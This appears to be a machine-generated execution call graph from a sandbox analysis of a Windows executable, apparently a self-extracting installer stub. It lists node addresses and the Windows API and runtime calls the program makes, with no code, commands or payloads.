                                                            Total number of Nodes:1526
                                                            Total number of Limit Nodes:28
                                                            execution_graph: [interactive call-graph rendering (node addresses, API call counts and edges) not reproduced as text; see the coverage summary above]
GetFileAttributesW 24393->24394 24394->24390 24395->24377 24396->24379 25421 208268 55 API calls _free 25366 1fe455 14 API calls ___delayLoadHelper2@8 25438 207f6e 52 API calls 3 library calls 25368 1fa440 GdipCloneImage GdipAlloc 25422 203a40 5 API calls _ValidateLocalCookies 25439 211f40 CloseHandle 24479 1e9f7a 24480 1e9f8f 24479->24480 24481 1e9f88 24479->24481 24482 1e9f9c GetStdHandle 24480->24482 24489 1e9fab 24480->24489 24482->24489 24483 1ea003 WriteFile 24483->24489 24484 1e9fcf 24485 1e9fd4 WriteFile 24484->24485 24484->24489 24485->24484 24485->24489 24487 1ea095 24491 1e6e98 77 API calls 24487->24491 24489->24481 24489->24483 24489->24484 24489->24485 24489->24487 24490 1e6baa 78 API calls 24489->24490 24490->24489 24491->24481 24493 1e9a74 24494 1e9a7e 24493->24494 24495 1e9b9d SetFilePointer 24494->24495 24498 1e9b79 24494->24498 24499 1e9ab1 24494->24499 24500 1e981a 24494->24500 24496 1e9bb6 GetLastError 24495->24496 24495->24499 24496->24499 24498->24495 24501 1e9833 24500->24501 24503 1e9e80 79 API calls 24501->24503 24502 1e9865 24502->24498 24503->24502 25370 1e1075 84 API calls 25441 1e1f72 128 API calls __EH_prolog 25371 1fa070 10 API calls 25423 1fb270 99 API calls 25373 1fc793 107 API calls 5 library calls 25376 20a4a0 71 API calls _free 25377 2108a0 IsProcessorFeaturePresent 25405 1fb18d 78 API calls 25379 1fc793 97 API calls 4 library calls 25424 1fc793 102 API calls 5 library calls 25406 1f9580 6 API calls 25445 1f1bbd GetCPInfo IsDBCSLeadByte 23620 1ff3b2 23621 1ff3be __FrameHandler3::FrameUnwindToState 23620->23621 23652 1feed7 23621->23652 23623 1ff518 23725 1ff838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 23623->23725 23624 1ff3c5 23624->23623 23628 1ff3ef 23624->23628 23626 1ff51f 23718 207f58 23626->23718 23637 1ff42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23628->23637 23663 208aed 23628->23663 23634 1ff40e 23636 1ff48f 23671 1ff953 
GetStartupInfoW _abort 23636->23671 23637->23636 23721 207af4 38 API calls 2 library calls 23637->23721 23639 1ff495 23672 208a3e 51 API calls 23639->23672 23641 1ff49d 23673 1fdf1e 23641->23673 23646 1ff4b1 23646->23626 23647 1ff4b5 23646->23647 23648 1ff4be 23647->23648 23723 207efb 28 API calls _abort 23647->23723 23724 1ff048 12 API calls ___scrt_uninitialize_crt 23648->23724 23651 1ff4c6 23651->23634 23653 1feee0 23652->23653 23727 1ff654 IsProcessorFeaturePresent 23653->23727 23655 1feeec 23728 202a5e 23655->23728 23657 1feef1 23662 1feef5 23657->23662 23736 208977 23657->23736 23660 1fef0c 23660->23624 23662->23624 23666 208b04 23663->23666 23664 1ffbbc _ValidateLocalCookies 5 API calls 23665 1ff408 23664->23665 23665->23634 23667 208a91 23665->23667 23666->23664 23668 208ac0 23667->23668 23669 1ffbbc _ValidateLocalCookies 5 API calls 23668->23669 23670 208ae9 23669->23670 23670->23637 23671->23639 23672->23641 23836 1f0863 23673->23836 23677 1fdf3d 23885 1fac16 23677->23885 23679 1fdf46 _abort 23680 1fdf59 GetCommandLineW 23679->23680 23681 1fdf68 23680->23681 23682 1fdfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23680->23682 23889 1fc5c4 23681->23889 23900 1e4092 23682->23900 23688 1fdf76 OpenFileMappingW 23692 1fdf8f MapViewOfFile 23688->23692 23693 1fdfd6 CloseHandle 23688->23693 23689 1fdfe0 23894 1fdbde 23689->23894 23695 1fdfcd UnmapViewOfFile 23692->23695 23696 1fdfa0 __InternalCxxFrameHandler 23692->23696 23693->23682 23695->23693 23700 1fdbde 2 API calls 23696->23700 23702 1fdfbc 23700->23702 23701 1f90b7 8 API calls 23703 1fe0aa DialogBoxParamW 23701->23703 23702->23695 23704 1fe0e4 23703->23704 23705 1fe0fd 23704->23705 23706 1fe0f6 Sleep 23704->23706 23708 1fe10b 23705->23708 23933 1fae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 23705->23933 23706->23705 23709 1fe12a DeleteObject 23708->23709 23710 1fe13f DeleteObject 23709->23710 23711 1fe146 23709->23711 23710->23711 23712 1fe189 23711->23712 23713 1fe177 23711->23713 
23930 1fac7c 23712->23930 23934 1fdc3b 6 API calls 23713->23934 23716 1fe17d CloseHandle 23716->23712 23717 1fe1c3 23722 1ff993 GetModuleHandleW 23717->23722 24185 207cd5 23718->24185 23721->23636 23722->23646 23723->23648 23724->23651 23725->23626 23727->23655 23740 203b07 23728->23740 23732 202a6f 23733 202a7a 23732->23733 23754 203b43 DeleteCriticalSection 23732->23754 23733->23657 23735 202a67 23735->23657 23783 20c05a 23736->23783 23739 202a7d 7 API calls 2 library calls 23739->23662 23741 203b10 23740->23741 23743 203b39 23741->23743 23744 202a63 23741->23744 23755 203d46 23741->23755 23760 203b43 DeleteCriticalSection 23743->23760 23744->23735 23746 202b8c 23744->23746 23776 203c57 23746->23776 23749 202ba1 23749->23732 23751 202baf 23752 202bbc 23751->23752 23782 202bbf 6 API calls ___vcrt_FlsFree 23751->23782 23752->23732 23754->23735 23761 203c0d 23755->23761 23758 203d7e InitializeCriticalSectionAndSpinCount 23759 203d69 23758->23759 23759->23741 23760->23744 23762 203c26 23761->23762 23766 203c4f 23761->23766 23762->23766 23768 203b72 23762->23768 23765 203c3b GetProcAddress 23765->23766 23767 203c49 23765->23767 23766->23758 23766->23759 23767->23766 23774 203b7e ___vcrt_InitializeCriticalSectionEx 23768->23774 23769 203bf3 23769->23765 23769->23766 23770 203b95 LoadLibraryExW 23771 203bb3 GetLastError 23770->23771 23772 203bfa 23770->23772 23771->23774 23772->23769 23773 203c02 FreeLibrary 23772->23773 23773->23769 23774->23769 23774->23770 23775 203bd5 LoadLibraryExW 23774->23775 23775->23772 23775->23774 23777 203c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 23776->23777 23778 203c71 23777->23778 23779 203c8a TlsAlloc 23778->23779 23780 202b96 23778->23780 23780->23749 23781 203d08 6 API calls ___vcrt_InitializeCriticalSectionEx 23780->23781 23781->23751 23782->23749 23784 20c077 23783->23784 23787 20c073 23783->23787 23784->23787 23789 20a6a0 23784->23789 23785 1ffbbc _ValidateLocalCookies 5 API calls 23786 1feefe 23785->23786 23786->23660 
23786->23739 23787->23785 23790 20a6ac __FrameHandler3::FrameUnwindToState 23789->23790 23801 20ac31 EnterCriticalSection 23790->23801 23792 20a6b3 23802 20c528 23792->23802 23794 20a6c2 23800 20a6d1 23794->23800 23815 20a529 29 API calls 23794->23815 23797 20a6cc 23816 20a5df GetStdHandle GetFileType 23797->23816 23798 20a6e2 _abort 23798->23784 23817 20a6ed LeaveCriticalSection _abort 23800->23817 23801->23792 23803 20c534 __FrameHandler3::FrameUnwindToState 23802->23803 23804 20c541 23803->23804 23805 20c558 23803->23805 23826 2091a8 20 API calls _abort 23804->23826 23818 20ac31 EnterCriticalSection 23805->23818 23808 20c546 23827 209087 26 API calls __cftof 23808->23827 23810 20c550 _abort 23810->23794 23811 20c590 23828 20c5b7 LeaveCriticalSection _abort 23811->23828 23813 20c564 23813->23811 23819 20c479 23813->23819 23815->23797 23816->23800 23817->23798 23818->23813 23820 20b136 _abort 20 API calls 23819->23820 23822 20c48b 23820->23822 23821 20c498 23823 208dcc _free 20 API calls 23821->23823 23822->23821 23829 20af0a 23822->23829 23825 20c4ea 23823->23825 23825->23813 23826->23808 23827->23810 23828->23810 23830 20ac98 _abort 5 API calls 23829->23830 23831 20af31 23830->23831 23832 20af4f InitializeCriticalSectionAndSpinCount 23831->23832 23833 20af3a 23831->23833 23832->23833 23834 1ffbbc _ValidateLocalCookies 5 API calls 23833->23834 23835 20af66 23834->23835 23835->23822 23935 1fec50 23836->23935 23839 1f0888 GetProcAddress 23842 1f08b9 GetProcAddress 23839->23842 23843 1f08a1 23839->23843 23840 1f08e7 23841 1f0c14 GetModuleFileNameW 23840->23841 23946 2075fb 42 API calls __vsnwprintf_l 23840->23946 23852 1f0c32 23841->23852 23845 1f08cb 23842->23845 23843->23842 23845->23840 23846 1f0b54 23846->23841 23847 1f0b5f GetModuleFileNameW CreateFileW 23846->23847 23848 1f0b8f SetFilePointer 23847->23848 23849 1f0c08 CloseHandle 23847->23849 23848->23849 23850 1f0b9d ReadFile 23848->23850 23849->23841 23850->23849 23853 1f0bbb 23850->23853 23855 1f0c94 
GetFileAttributesW 23852->23855 23856 1f0cac 23852->23856 23858 1f0c5d CompareStringW 23852->23858 23937 1eb146 23852->23937 23940 1f081b 23852->23940 23853->23849 23857 1f081b 2 API calls 23853->23857 23855->23852 23855->23856 23859 1f0cb7 23856->23859 23861 1f0cec 23856->23861 23857->23853 23858->23852 23862 1f0cd0 GetFileAttributesW 23859->23862 23864 1f0ce8 23859->23864 23860 1f0dfb 23884 1fa64d GetCurrentDirectoryW 23860->23884 23861->23860 23863 1eb146 GetVersionExW 23861->23863 23862->23859 23862->23864 23865 1f0d06 23863->23865 23864->23861 23866 1f0d0d 23865->23866 23867 1f0d73 23865->23867 23869 1f081b 2 API calls 23866->23869 23868 1e4092 _swprintf 51 API calls 23867->23868 23870 1f0d9b AllocConsole 23868->23870 23871 1f0d17 23869->23871 23872 1f0da8 GetCurrentProcessId AttachConsole 23870->23872 23873 1f0df3 ExitProcess 23870->23873 23874 1f081b 2 API calls 23871->23874 23951 203e13 23872->23951 23876 1f0d21 23874->23876 23947 1ee617 23876->23947 23877 1f0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23877->23873 23880 1e4092 _swprintf 51 API calls 23881 1f0d4f 23880->23881 23882 1ee617 53 API calls 23881->23882 23883 1f0d5e 23882->23883 23883->23873 23884->23677 23886 1f081b 2 API calls 23885->23886 23887 1fac2a OleInitialize 23886->23887 23888 1fac4d GdiplusStartup SHGetMalloc 23887->23888 23888->23679 23892 1fc5ce 23889->23892 23890 1fc6e4 23890->23688 23890->23689 23891 1f1fac CharUpperW 23891->23892 23892->23890 23892->23891 23976 1ef3fa 82 API calls 2 library calls 23892->23976 23895 1fec50 23894->23895 23896 1fdbeb SetEnvironmentVariableW 23895->23896 23897 1fdc0e 23896->23897 23898 1fdc36 23897->23898 23899 1fdc2a SetEnvironmentVariableW 23897->23899 23898->23682 23899->23898 23977 1e4065 23900->23977 23903 1fb6dd LoadBitmapW 23904 1fb6fe 23903->23904 23905 1fb70b GetObjectW 23903->23905 24011 1fa6c2 FindResourceW 23904->24011 23907 1fb71a 23905->23907 24006 1fa5c6 23907->24006 23911 1fb770 23922 1eda42 23911->23922 23912 1fb74c 24027 1fa605 
GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23912->24027 23913 1fa6c2 13 API calls 23915 1fb73d 23913->23915 23915->23912 23917 1fb743 DeleteObject 23915->23917 23916 1fb754 24028 1fa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23916->24028 23917->23912 23919 1fb75d 24029 1fa80c 8 API calls 23919->24029 23921 1fb764 DeleteObject 23921->23911 24040 1eda67 23922->24040 23927 1f90b7 24173 1feb38 23927->24173 23931 1facab GdiplusShutdown CoUninitialize 23930->23931 23931->23717 23933->23708 23934->23716 23936 1f086d GetModuleHandleW 23935->23936 23936->23839 23936->23840 23938 1eb15a GetVersionExW 23937->23938 23939 1eb196 23937->23939 23938->23939 23939->23852 23941 1fec50 23940->23941 23942 1f0828 GetSystemDirectoryW 23941->23942 23943 1f085e 23942->23943 23944 1f0840 23942->23944 23943->23852 23945 1f0851 LoadLibraryW 23944->23945 23945->23943 23946->23846 23948 1ee627 23947->23948 23953 1ee648 23948->23953 23952 203e1b 23951->23952 23952->23877 23952->23952 23959 1ed9b0 23953->23959 23956 1ee66b LoadStringW 23957 1ee645 23956->23957 23958 1ee682 LoadStringW 23956->23958 23957->23880 23958->23957 23964 1ed8ec 23959->23964 23961 1ed9cd 23963 1ed9e2 23961->23963 23972 1ed9f0 26 API calls 23961->23972 23963->23956 23963->23957 23965 1ed904 23964->23965 23971 1ed984 _strncpy 23964->23971 23967 1ed928 23965->23967 23973 1f1da7 WideCharToMultiByte 23965->23973 23970 1ed959 23967->23970 23974 1ee5b1 50 API calls __vsnprintf 23967->23974 23975 206159 26 API calls 3 library calls 23970->23975 23971->23961 23972->23963 23973->23967 23974->23970 23975->23971 23976->23892 23978 1e407c __vsnwprintf_l 23977->23978 23981 205fd4 23978->23981 23984 204097 23981->23984 23985 2040d7 23984->23985 23986 2040bf 23984->23986 23985->23986 23987 2040df 23985->23987 24001 2091a8 20 API calls _abort 23986->24001 23989 204636 __fassign 38 API calls 23987->23989 23991 2040ef 23989->23991 23990 2040c4 24002 209087 26 API calls __cftof 23990->24002 24003 204601 20 API calls 2 library calls 
23991->24003 23994 1ffbbc _ValidateLocalCookies 5 API calls 23996 1e4086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23994->23996 23995 204167 24004 2049e6 51 API calls 4 library calls 23995->24004 23996->23903 23998 204172 24005 2046b9 20 API calls _free 23998->24005 24000 2040cf 24000->23994 24001->23990 24002->24000 24003->23995 24004->23998 24005->24000 24030 1fa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24006->24030 24008 1fa5cd 24009 1fa5d9 24008->24009 24031 1fa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24008->24031 24009->23911 24009->23912 24009->23913 24012 1fa7d3 24011->24012 24013 1fa6e5 SizeofResource 24011->24013 24012->23905 24012->23907 24013->24012 24014 1fa6fc LoadResource 24013->24014 24014->24012 24015 1fa711 LockResource 24014->24015 24015->24012 24016 1fa722 GlobalAlloc 24015->24016 24016->24012 24017 1fa73d GlobalLock 24016->24017 24018 1fa7cc GlobalFree 24017->24018 24019 1fa74c __InternalCxxFrameHandler 24017->24019 24018->24012 24020 1fa754 CreateStreamOnHGlobal 24019->24020 24021 1fa76c 24020->24021 24022 1fa7c5 GlobalUnlock 24020->24022 24032 1fa626 GdipAlloc 24021->24032 24022->24018 24025 1fa79a GdipCreateHBITMAPFromBitmap 24026 1fa7b0 24025->24026 24026->24022 24027->23916 24028->23919 24029->23921 24030->24008 24031->24009 24033 1fa638 24032->24033 24034 1fa645 24032->24034 24036 1fa3b9 24033->24036 24034->24022 24034->24025 24034->24026 24037 1fa3da GdipCreateBitmapFromStreamICM 24036->24037 24038 1fa3e1 GdipCreateBitmapFromStream 24036->24038 24039 1fa3e6 24037->24039 24038->24039 24039->24034 24041 1eda75 _wcschr __EH_prolog 24040->24041 24042 1edaa4 GetModuleFileNameW 24041->24042 24043 1edad5 24041->24043 24044 1edabe 24042->24044 24086 1e98e0 24043->24086 24044->24043 24046 1edb31 24097 206310 24046->24097 24048 1ee261 78 API calls 24051 1edb05 24048->24051 24051->24046 24051->24048 24064 1edd4a 24051->24064 24052 1edb44 24053 206310 26 API calls 24052->24053 24061 1edb56 ___vcrt_InitializeCriticalSectionEx 
24053->24061 24054 1edc85 24054->24064 24133 1e9d70 81 API calls 24054->24133 24058 1edc9f ___std_exception_copy 24059 1e9bd0 82 API calls 24058->24059 24058->24064 24062 1edcc8 ___std_exception_copy 24059->24062 24061->24054 24061->24064 24111 1e9e80 24061->24111 24127 1e9bd0 24061->24127 24132 1e9d70 81 API calls 24061->24132 24062->24064 24081 1edcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 24062->24081 24134 1f1b84 MultiByteToWideChar 24062->24134 24120 1e959a 24064->24120 24065 1ee159 24069 1ee1de 24065->24069 24140 208cce 26 API calls 2 library calls 24065->24140 24067 1ee16e 24141 207625 26 API calls 2 library calls 24067->24141 24070 1ee214 24069->24070 24073 1ee261 78 API calls 24069->24073 24074 206310 26 API calls 24070->24074 24072 1ee1c6 24142 1ee27c 78 API calls 24072->24142 24073->24069 24076 1ee22d 24074->24076 24077 206310 26 API calls 24076->24077 24077->24064 24079 1f1da7 WideCharToMultiByte 24079->24081 24081->24064 24081->24065 24081->24079 24135 1ee5b1 50 API calls __vsnprintf 24081->24135 24136 206159 26 API calls 3 library calls 24081->24136 24137 208cce 26 API calls 2 library calls 24081->24137 24138 207625 26 API calls 2 library calls 24081->24138 24139 1ee27c 78 API calls 24081->24139 24084 1ee29e GetModuleHandleW FindResourceW 24085 1eda55 24084->24085 24085->23927 24088 1e98ea 24086->24088 24087 1e994b CreateFileW 24089 1e996c GetLastError 24087->24089 24092 1e99bb 24087->24092 24088->24087 24143 1ebb03 24089->24143 24091 1e998c 24091->24092 24094 1e9990 CreateFileW GetLastError 24091->24094 24093 1e99ff 24092->24093 24095 1e99e5 SetFileTime 24092->24095 24093->24051 24094->24092 24096 1e99b5 24094->24096 24095->24093 24096->24092 24098 206349 24097->24098 24099 20634d 24098->24099 24110 206375 24098->24110 24147 2091a8 20 API calls _abort 24099->24147 24101 206352 24148 209087 26 API calls __cftof 24101->24148 24102 206699 24104 1ffbbc _ValidateLocalCookies 5 API calls 24102->24104 24106 2066a6 24104->24106 
24105 20635d 24107 1ffbbc _ValidateLocalCookies 5 API calls 24105->24107 24106->24052 24108 206369 24107->24108 24108->24052 24110->24102 24149 206230 5 API calls _ValidateLocalCookies 24110->24149 24112 1e9e92 24111->24112 24114 1e9ea5 24111->24114 24113 1e9eb0 24112->24113 24150 1e6d5b 77 API calls 24112->24150 24113->24061 24114->24113 24116 1e9eb8 SetFilePointer 24114->24116 24116->24113 24117 1e9ed4 GetLastError 24116->24117 24117->24113 24118 1e9ede 24117->24118 24118->24113 24151 1e6d5b 77 API calls 24118->24151 24121 1e95be 24120->24121 24122 1e95cf 24120->24122 24121->24122 24123 1e95ca 24121->24123 24124 1e95d1 24121->24124 24122->24084 24152 1e974e 24123->24152 24157 1e9620 24124->24157 24128 1e9bdc 24127->24128 24130 1e9be3 24127->24130 24128->24061 24130->24128 24131 1e9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24130->24131 24172 1e6d1a 77 API calls 24130->24172 24131->24130 24132->24061 24133->24058 24134->24081 24135->24081 24136->24081 24137->24081 24138->24081 24139->24081 24140->24067 24141->24072 24142->24069 24144 1ebb10 _wcslen 24143->24144 24145 1ebbb8 GetCurrentDirectoryW 24144->24145 24146 1ebb39 _wcslen 24144->24146 24145->24146 24146->24091 24147->24101 24148->24105 24149->24110 24150->24114 24151->24113 24153 1e9757 24152->24153 24154 1e9781 24152->24154 24153->24154 24163 1ea1e0 24153->24163 24154->24122 24158 1e964a 24157->24158 24159 1e962c 24157->24159 24160 1e9669 24158->24160 24171 1e6bd5 76 API calls 24158->24171 24159->24158 24161 1e9638 CloseHandle 24159->24161 24160->24122 24161->24158 24164 1fec50 24163->24164 24165 1ea1ed DeleteFileW 24164->24165 24166 1e977f 24165->24166 24167 1ea200 24165->24167 24166->24122 24168 1ebb03 GetCurrentDirectoryW 24167->24168 24169 1ea214 24168->24169 24169->24166 24170 1ea218 DeleteFileW 24169->24170 24170->24166 24171->24160 24172->24130 24174 1feb3d ___std_exception_copy 24173->24174 24175 1f90d6 24174->24175 24178 1feb59 24174->24178 24182 207a5e 7 API calls 2 library 
calls 24174->24182 24175->23701 24177 1ff5c9 24184 20238d RaiseException 24177->24184 24178->24177 24183 20238d RaiseException 24178->24183 24181 1ff5e6 24182->24174 24183->24177 24184->24181 24186 207ce1 _unexpected 24185->24186 24187 207ce8 24186->24187 24188 207cfa 24186->24188 24221 207e2f GetModuleHandleW 24187->24221 24209 20ac31 EnterCriticalSection 24188->24209 24191 207ced 24191->24188 24222 207e73 GetModuleHandleExW 24191->24222 24192 207d9f 24210 207ddf 24192->24210 24195 207d01 24195->24192 24197 207d76 24195->24197 24230 2087e0 20 API calls _abort 24195->24230 24201 207d8e 24197->24201 24206 208a91 _abort 5 API calls 24197->24206 24199 207de8 24231 212390 5 API calls _ValidateLocalCookies 24199->24231 24200 207dbc 24213 207dee 24200->24213 24202 208a91 _abort 5 API calls 24201->24202 24202->24192 24206->24201 24209->24195 24232 20ac81 LeaveCriticalSection 24210->24232 24212 207db8 24212->24199 24212->24200 24233 20b076 24213->24233 24216 207e1c 24219 207e73 _abort 8 API calls 24216->24219 24217 207dfc GetPEB 24217->24216 24218 207e0c GetCurrentProcess TerminateProcess 24217->24218 24218->24216 24220 207e24 ExitProcess 24219->24220 24221->24191 24223 207ec0 24222->24223 24224 207e9d GetProcAddress 24222->24224 24225 207ec6 FreeLibrary 24223->24225 24226 207ecf 24223->24226 24227 207eb2 24224->24227 24225->24226 24228 1ffbbc _ValidateLocalCookies 5 API calls 24226->24228 24227->24223 24229 207cf9 24228->24229 24229->24188 24230->24197 24232->24212 24234 20b09b 24233->24234 24238 20b091 24233->24238 24235 20ac98 _abort 5 API calls 24234->24235 24235->24238 24236 1ffbbc _ValidateLocalCookies 5 API calls 24237 207df8 24236->24237 24237->24216 24237->24217 24238->24236 24239 1fe5b1 24240 1fe578 24239->24240 24242 1fe85d 24240->24242 24268 1fe5bb 24242->24268 24244 1fe86d 24245 1fe8ca 24244->24245 24248 1fe8ee 24244->24248 24246 1fe7fb DloadReleaseSectionWriteAccess 6 API calls 24245->24246 24247 1fe8d5 RaiseException 24246->24247 24249 1feac3 24247->24249 
24250 1fe966 LoadLibraryExA 24248->24250 24252 1fe9c7 24248->24252 24255 1fe9d9 24248->24255 24264 1fea95 24248->24264 24249->24240 24251 1fe979 GetLastError 24250->24251 24250->24252 24253 1fe98c 24251->24253 24254 1fe9a2 24251->24254 24252->24255 24257 1fe9d2 FreeLibrary 24252->24257 24253->24252 24253->24254 24258 1fe7fb DloadReleaseSectionWriteAccess 6 API calls 24254->24258 24256 1fea37 GetProcAddress 24255->24256 24255->24264 24259 1fea47 GetLastError 24256->24259 24256->24264 24257->24255 24260 1fe9ad RaiseException 24258->24260 24261 1fea5a 24259->24261 24260->24249 24263 1fe7fb DloadReleaseSectionWriteAccess 6 API calls 24261->24263 24261->24264 24265 1fea7b RaiseException 24263->24265 24277 1fe7fb 24264->24277 24266 1fe5bb ___delayLoadHelper2@8 6 API calls 24265->24266 24267 1fea92 24266->24267 24267->24264 24269 1fe5ed 24268->24269 24270 1fe5c7 24268->24270 24269->24244 24285 1fe664 24270->24285 24272 1fe5cc 24273 1fe5e8 24272->24273 24288 1fe78d 24272->24288 24293 1fe5ee GetModuleHandleW GetProcAddress GetProcAddress 24273->24293 24276 1fe836 24276->24244 24278 1fe82f 24277->24278 24279 1fe80d 24277->24279 24278->24249 24280 1fe664 DloadReleaseSectionWriteAccess 3 API calls 24279->24280 24281 1fe812 24280->24281 24282 1fe82a 24281->24282 24283 1fe78d DloadProtectSection 3 API calls 24281->24283 24296 1fe831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24282->24296 24283->24282 24294 1fe5ee GetModuleHandleW GetProcAddress GetProcAddress 24285->24294 24287 1fe669 24287->24272 24291 1fe7a2 DloadProtectSection 24288->24291 24289 1fe7a8 24289->24273 24290 1fe7dd VirtualProtect 24290->24289 24291->24289 24291->24290 24295 1fe6a3 VirtualQuery GetSystemInfo 24291->24295 24293->24276 24294->24287 24295->24290 24296->24278 25408 1fb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25446 1e6faa 111 API calls 3 library calls 25409 1feda7 48 API calls _unexpected 25382 20b49d 6 API calls _ValidateLocalCookies 25383 1fdca1 
DialogBoxParamW 25447 1ff3a0 27 API calls 25425 20bee0 GetCommandLineA GetCommandLineW 24397 1fe2d7 24398 1fe1db 24397->24398 24399 1fe85d ___delayLoadHelper2@8 14 API calls 24398->24399 24399->24398 24401 1e10d5 24406 1e5abd 24401->24406 24407 1e5ac7 __EH_prolog 24406->24407 24413 1eb505 24407->24413 24409 1e5ad3 24419 1e5cac GetCurrentProcess GetProcessAffinityMask 24409->24419 24414 1eb50f __EH_prolog 24413->24414 24420 1ef1d0 82 API calls 24414->24420 24416 1eb521 24421 1eb61e 24416->24421 24420->24416 24422 1eb630 _abort 24421->24422 24425 1f10dc 24422->24425 24428 1f109e GetCurrentProcess GetProcessAffinityMask 24425->24428 24429 1eb597 24428->24429 24429->24409 25384 1ff4d3 20 API calls 24430 1fe1d1 14 API calls ___delayLoadHelper2@8 24432 2098f0 24440 20adaf 24432->24440 24436 20990c 24437 209919 24436->24437 24448 209920 11 API calls 24436->24448 24439 209904 24441 20ac98 _abort 5 API calls 24440->24441 24442 20add6 24441->24442 24443 20adee TlsAlloc 24442->24443 24444 20addf 24442->24444 24443->24444 24445 1ffbbc _ValidateLocalCookies 5 API calls 24444->24445 24446 2098fa 24445->24446 24446->24439 24447 209869 20 API calls 2 library calls 24446->24447 24447->24436 24448->24439 24449 20abf0 24451 20abfb 24449->24451 24450 20af0a 11 API calls 24450->24451 24451->24450 24452 20ac24 24451->24452 24454 20ac20 24451->24454 24455 20ac50 DeleteCriticalSection 24452->24455 24455->24454 25385 2088f0 7 API calls ___scrt_uninitialize_crt 25427 1f62ca 123 API calls __InternalCxxFrameHandler 25387 202cfb 38 API calls 4 library calls 24464 1fdec2 24465 1fdecf 24464->24465 24466 1ee617 53 API calls 24465->24466 24467 1fdedc 24466->24467 24468 1e4092 _swprintf 51 API calls 24467->24468 24469 1fdef1 SetDlgItemTextW 24468->24469 24472 1fb568 PeekMessageW 24469->24472 24473 1fb5bc 24472->24473 24474 1fb583 GetMessageW 24472->24474 24475 1fb599 IsDialogMessageW 24474->24475 24476 1fb5a8 TranslateMessage DispatchMessageW 24474->24476 24475->24473 24475->24476 24476->24473 
25410 1fb5c0 100 API calls 25451 1f77c0 118 API calls 25452 1fffc0 RaiseException _com_raise_error _com_error::_com_error 25411 1e95f0 80 API calls 25412 1ffd4f 9 API calls 2 library calls 25428 1e5ef0 82 API calls 25453 20a3d0 21 API calls 2 library calls 25454 212bd0 VariantClear 25415 1ef1e8 FreeLibrary 24511 1feae7 24512 1feaf1 24511->24512 24513 1fe85d ___delayLoadHelper2@8 14 API calls 24512->24513 24514 1feafe 24513->24514 25389 1ff4e7 29 API calls _abort 25430 200ada 51 API calls 2 library calls 24516 1fb7e0 24517 1fb7ea __EH_prolog 24516->24517 24684 1e1316 24517->24684 24520 1fbf0f 24749 1fd69e 24520->24749 24521 1fb82a 24523 1fb89b 24521->24523 24524 1fb838 24521->24524 24597 1fb841 24521->24597 24526 1fb92e GetDlgItemTextW 24523->24526 24531 1fb8b1 24523->24531 24527 1fb83c 24524->24527 24528 1fb878 24524->24528 24526->24528 24534 1fb96b 24526->24534 24538 1ee617 53 API calls 24527->24538 24527->24597 24535 1fb95f KiUserCallbackDispatcher 24528->24535 24528->24597 24529 1fbf2a SendMessageW 24530 1fbf38 24529->24530 24532 1fbf52 GetDlgItem SendMessageW 24530->24532 24533 1fbf41 SendDlgItemMessageW 24530->24533 24537 1ee617 53 API calls 24531->24537 24767 1fa64d GetCurrentDirectoryW 24532->24767 24533->24532 24536 1fb980 GetDlgItem 24534->24536 24682 1fb974 24534->24682 24535->24597 24540 1fb9b7 SetFocus 24536->24540 24541 1fb994 SendMessageW SendMessageW 24536->24541 24542 1fb8ce SetDlgItemTextW 24537->24542 24543 1fb85b 24538->24543 24545 1fb9c7 24540->24545 24562 1fb9e0 24540->24562 24541->24540 24546 1fb8d9 24542->24546 24789 1e124f SHGetMalloc 24543->24789 24544 1fbf82 GetDlgItem 24548 1fbf9f 24544->24548 24549 1fbfa5 SetWindowTextW 24544->24549 24551 1ee617 53 API calls 24545->24551 24555 1fb8e6 GetMessageW 24546->24555 24546->24597 24548->24549 24768 1fabab GetClassNameW 24549->24768 24556 1fb9d1 24551->24556 24552 1fb862 24563 1fc1fc SetDlgItemTextW 24552->24563 24552->24597 24553 1fbe55 24557 1ee617 53 API calls 24553->24557 24560 1fb8fd 
IsDialogMessageW 24555->24560 24555->24597 24790 1fd4d4 24556->24790 24558 1fbe65 SetDlgItemTextW 24557->24558 24564 1fbe79 24558->24564 24560->24546 24566 1fb90c TranslateMessage DispatchMessageW 24560->24566 24567 1ee617 53 API calls 24562->24567 24563->24597 24569 1ee617 53 API calls 24564->24569 24566->24546 24568 1fba17 24567->24568 24571 1e4092 _swprintf 51 API calls 24568->24571 24605 1fbe9c _wcslen 24569->24605 24570 1fbff0 24574 1fc020 24570->24574 24577 1ee617 53 API calls 24570->24577 24576 1fba29 24571->24576 24572 1fc73f 97 API calls 24572->24570 24573 1fb9d9 24694 1ea0b1 24573->24694 24579 1fc0d8 24574->24579 24580 1fc73f 97 API calls 24574->24580 24581 1fd4d4 16 API calls 24576->24581 24583 1fc003 SetDlgItemTextW 24577->24583 24582 1fc18b 24579->24582 24614 1fc169 24579->24614 24633 1ee617 53 API calls 24579->24633 24586 1fc03b 24580->24586 24581->24573 24587 1fc19d 24582->24587 24588 1fc194 EnableWindow 24582->24588 24589 1ee617 53 API calls 24583->24589 24584 1fba73 24700 1fac04 SetCurrentDirectoryW 24584->24700 24585 1fba68 GetLastError 24585->24584 24598 1fc04d 24586->24598 24618 1fc072 24586->24618 24593 1fc1ba 24587->24593 24808 1e12d3 GetDlgItem EnableWindow 24587->24808 24588->24587 24594 1fc017 SetDlgItemTextW 24589->24594 24591 1fba87 24595 1fba9e 24591->24595 24596 1fba90 GetLastError 24591->24596 24592 1ee617 53 API calls 24592->24597 24601 1fc1e1 24593->24601 24609 1fc1d9 SendMessageW 24593->24609 24594->24574 24607 1fbb20 24595->24607 24610 1fbaae GetTickCount 24595->24610 24656 1fbb11 24595->24656 24596->24595 24806 1f9ed5 32 API calls 24598->24806 24599 